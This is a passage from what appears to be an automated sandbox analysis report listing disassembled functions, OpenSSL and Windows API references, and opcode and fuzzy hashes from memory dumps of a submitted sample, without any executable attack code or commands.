                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_errorY_freeY_up_ref
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa.c$ssl_set_pkey
                                                                                                                                                                                                                            • API String ID: 4194652714-507513155
                                                                                                                                                                                                                            • Opcode ID: c566581f58e1a20692269512846b10992f1b0e00bdf86cd5d0764f38237cf847
                                                                                                                                                                                                                            • Instruction ID: 3ceadd4c126c57841b72c3e00432536ec2e4a6212a9f8ff21bd2cb70dc0c6468
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c566581f58e1a20692269512846b10992f1b0e00bdf86cd5d0764f38237cf847
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4421A562B18A8296EF449B15E4A06FD6320FB89784FD84231EB2DC37DAEF3DD5518700
                                                                                                                                                                                                                            Function 00007FFDFF241F91 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: A_freePrivateR_newR_set_debugR_set_errord2i_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa_legacy.c$SSL_use_RSAPrivateKey_ASN1
                                                                                                                                                                                                                            • API String ID: 3102899966-1618854237
                                                                                                                                                                                                                            • Opcode ID: 9f04b407c855cb80b6d83cb062539961779f71bb4d3ad58bdf7a8f0ea1b5394d
                                                                                                                                                                                                                            • Instruction ID: bd008a6723934075073127ef6f332631ebf8388b4d84161b7b5770c9b3e7e521
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f04b407c855cb80b6d83cb062539961779f71bb4d3ad58bdf7a8f0ea1b5394d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4018F51B1C68246EB48B765F861AF993509F88780F845231FA7ECBBDFED2CD8404B00
                                                                                                                                                                                                                            Function 00007FFDFF241D20 Relevance: 12.1, APIs: 8, Instructions: 117COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_peek_error
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3623038435-0
                                                                                                                                                                                                                            • Opcode ID: 3c7e126b5cef267368cdbbdaf1a072c4bcf2a9c1d3d3ecbedb3083a132243c71
                                                                                                                                                                                                                            • Instruction ID: 863ecd3032fbd792a7bb2bb1dcb24e76c9010f4e456ce1f94d78e5a5eb0ec7b2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c7e126b5cef267368cdbbdaf1a072c4bcf2a9c1d3d3ecbedb3083a132243c71
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24415E61F0C64242FB64A5259671B799391DF41F84F244231ED3FC66EEDE1CF8818781
                                                                                                                                                                                                                            Function 00007FFDFF241E7E Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_construct_server_hello
                                                                                                                                                                                                                            • API String ID: 476316267-2775970066
                                                                                                                                                                                                                            • Opcode ID: 0f32a89288ce82e47299ae510ff903dcef0adb58054955722936e32d63cc69a3
                                                                                                                                                                                                                            • Instruction ID: 37000b26eb9c29f10b3d22069d4d744d3be55bd728d78145ed2bea4485ec0b73
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f32a89288ce82e47299ae510ff903dcef0adb58054955722936e32d63cc69a3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16618321B0868345FB609A26D460FB92790EB81B84F484231DF7DCB6EEDF6DE941D700
                                                                                                                                                                                                                            Function 00007FFDFABD16D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: a unicode character$argument$category
                                                                                                                                                                                                                            • API String ID: 1318908108-2068800536
                                                                                                                                                                                                                            • Opcode ID: c31e599aff6ce8fd118d7930930d13bb61e4023c7ccaaddb711cf16cebfbc0cd
                                                                                                                                                                                                                            • Instruction ID: daa987a970d4e2d36771a32bd2394afa62b186a356d772a7ac4e04f0ba79f9a9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c31e599aff6ce8fd118d7930930d13bb61e4023c7ccaaddb711cf16cebfbc0cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B15191A2B1964782EB5CCB05E470AB867A1EF84B84F880175DAAF577D9DF3DE851C300
                                                                                                                                                                                                                            Function 00007FFDFF241014 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_cust.c$custom_ext_parse
                                                                                                                                                                                                                            • API String ID: 193678381-2402109875
                                                                                                                                                                                                                            • Opcode ID: fcd215936162fddef4fca894ce991182ecc1f3585406e271daa661088df41245
                                                                                                                                                                                                                            • Instruction ID: fdc7102a810074089440b2d3b3e8d4ed04ae961ce4b0219644de8dfb8d4a16a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcd215936162fddef4fca894ce991182ecc1f3585406e271daa661088df41245
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5841A121B0968282E7749B16E560BB96391FF84BC8F545231DEBDC3BD9EE3CD9419B00
                                                                                                                                                                                                                            Function 00007FFDFABD1000 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 106COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: a unicode character$argument$bidirectional
                                                                                                                                                                                                                            • API String ID: 1318908108-2110215792
                                                                                                                                                                                                                            • Opcode ID: 2be184d8cc6ee1ee00809d45acc887d572eb9887141ab2374770304697e252f3
                                                                                                                                                                                                                            • Instruction ID: 031c5f146dacc6c35ff19e1221d8d5dabad6acb21c8d7d547235732e3c686b7b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2be184d8cc6ee1ee00809d45acc887d572eb9887141ab2374770304697e252f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9941B0A6B1DA8382EB5C8B05E471B796361EF04B90FC45179DA6E476D8CF3DE8909310
                                                                                                                                                                                                                            Function 00007FFDFF241F9B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$tls_construct_stoc_status_request
                                                                                                                                                                                                                            • API String ID: 193678381-3916275234
                                                                                                                                                                                                                            • Opcode ID: 0c827e98e9f4675d18d7c22e9ec49be31b6003bf6ad4b8ef0e14d14cb0b60b8f
                                                                                                                                                                                                                            • Instruction ID: 726edc3e8c761f905e38a19e93a9718247a05fa5313519c16be0da425b53a637
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c827e98e9f4675d18d7c22e9ec49be31b6003bf6ad4b8ef0e14d14cb0b60b8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2319211B0C64242FB649725E961FB92350AF85B88F580231DD7CCBADADE6DE9829B00
                                                                                                                                                                                                                            Function 00007FF60299CD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDBD
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDCB
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CDF5
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CE63
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF60299CFEA,?,?,?,00007FF60299CCDC,?,?,?,00007FF60299C8D9), ref: 00007FF60299CE6F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                            • Opcode ID: f4b61b4a979ce7b8aa7688bccc3df649cfb1a919573dd57fb344de185da50708
                                                                                                                                                                                                                            • Instruction ID: 177b2c74e9944bd3e482a7f05618e4711a866a87176818f598c54d1c9b0cfafd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4b61b4a979ce7b8aa7688bccc3df649cfb1a919573dd57fb344de185da50708
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D731F821B1A70295EE52DB5BA8005742B98FF0CBB8F695536DD1E87382DFBCE864C340
                                                                                                                                                                                                                            Function 00007FFDFF241E11 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_construct_server_certificate
                                                                                                                                                                                                                            • API String ID: 193678381-3740638300
                                                                                                                                                                                                                            • Opcode ID: 3f32967d6b6287e797fe477c8ce9a68debc1e3d790234be0239ef7995df80228
                                                                                                                                                                                                                            • Instruction ID: ed8f5c1b0213ad1c02e85602521ee6bc5dbf4a70ac63a6562161c03bc1388ac1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f32967d6b6287e797fe477c8ce9a68debc1e3d790234be0239ef7995df80228
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F421E421B18A8246F784D722E861FAD5760EB84BC4F485231EE3DC3BDEDE2CD5818B00
                                                                                                                                                                                                                            Function 00007FF602997AA0 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                            • Opcode ID: 4843f88056ca8b0747670838a5d0587040f5e6acea90c3b01a1795f2463a0b72
                                                                                                                                                                                                                            • Instruction ID: df881386eab03e55c47a3404cb7ae34dc1359f645cadbac16a19c65dddf9a896
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4843f88056ca8b0747670838a5d0587040f5e6acea90c3b01a1795f2463a0b72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2216531A1C64646EB508B5AE58027AFBA1FF85BB8F200235D65D83BD6DFBCD4548704
                                                                                                                                                                                                                            Function 00007FFDFF241C67 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_lib.c$ssl3_output_cert_chain
                                                                                                                                                                                                                            • API String ID: 193678381-603691555
                                                                                                                                                                                                                            • Opcode ID: 9d9e6cd5aa8a5f924eb8d1e6a2a44f34472bca1704abac81a1808de083805483
                                                                                                                                                                                                                            • Instruction ID: 1a09c048a594d92aade5d1c01b68ae6060834d73301a58ca4feeaf12ba2e4eba
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d9e6cd5aa8a5f924eb8d1e6a2a44f34472bca1704abac81a1808de083805483
